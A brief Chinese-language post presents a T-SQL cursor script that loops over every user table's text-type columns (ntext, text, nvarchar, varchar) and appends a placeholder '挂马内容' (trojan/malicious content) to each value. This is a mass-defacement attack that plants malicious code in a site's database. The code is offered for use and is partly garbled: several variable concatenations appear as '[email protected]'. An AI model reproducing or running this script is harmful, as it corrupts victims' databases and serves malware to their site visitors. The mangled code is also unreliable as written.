SQL语句如下: 

用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段) 

xtype=99 ntext 
xtype=35 text 
xtype=231 nvarchar 
xtype=167 varchar 
———————YD的分割——————————– 

DECLARE @T varchar(255), 
@C varchar(255) 
DECLARE Table_Cursor CURSOR FOR 
Select 
a.name,b.name 
from sysobjects a, 
syscolumns b 
where a.id=b.id and 
a.xtype='u' and 
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
OPEN Table_Cursor 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) 
BEGIN 
exec('update ['[email protected]+'] set ['[email protected]+']= 
rtrim(convert(varchar,['[email protected]+']))+ 
”挂马内容”') 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
END 
CLOSE Table_Cursor 
DEALLOCATE Table_Cursor